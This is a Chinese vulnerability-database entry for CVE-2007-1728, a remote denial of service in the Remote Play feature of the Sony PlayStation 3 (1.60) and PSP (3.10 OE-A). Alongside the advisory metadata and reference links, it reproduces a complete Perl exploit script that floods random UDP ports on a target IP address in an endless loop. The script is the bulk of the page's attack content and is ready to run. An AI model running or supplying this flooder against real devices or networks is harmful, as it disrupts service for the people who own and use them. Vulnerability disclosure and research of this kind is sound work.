Sony Playstation拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191187 漏洞类型 未知
发布时间 2007-03-28 更新时间 2007-03-28
CVE编号 CVE-2007-1728 CNNVD-ID CNNVD-200703-654
漏洞平台 N/A CVSS评分 7.8
|漏洞来源
https://www.securityfocus.com/bid/86389
https://cxsecurity.com/issue/WLB-2007030183
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-654
|漏洞详情
SonyPlaystation3(PS3)1.60和PlaystationPortable(PSP)3.10OE-A版本的远程播放特性允许远程攻击者借助UDP信息包的流量,引起拒绝服务攻击。
|漏洞EXP
#!/usr/bin/perl

####.:Playstation 3 "Remote Play" Remote DoS Exploit:.####
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.	
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K <mak0b[AT]inbox.com>
# 
# POC code is based on odix's perl udp flooder
##########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=1) {
 printf "usage: ./ps3rpdos.pl <ip>\n";
 exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
|受影响的产品
Sony PSP 3.10 Oe-A Sony Playstation 3 1.60
|参考资料

来源:BUGTRAQ
名称:20070326Playstation3"RemotePlay"RemoteDoSExploit
链接:http://www.securityfocus.com/archive/1/archive/1/463847/100/0/threaded
来源:OSVDB
名称:35184
链接:http://osvdb.org/35184
来源:XF
名称:ps3-psp-udp-dos(33503)
链接:http://xforce.iss.net/xforce/xfdb/33503
来源:SREASON
名称:2485
链接:http://securityreason.com/securityalert/2485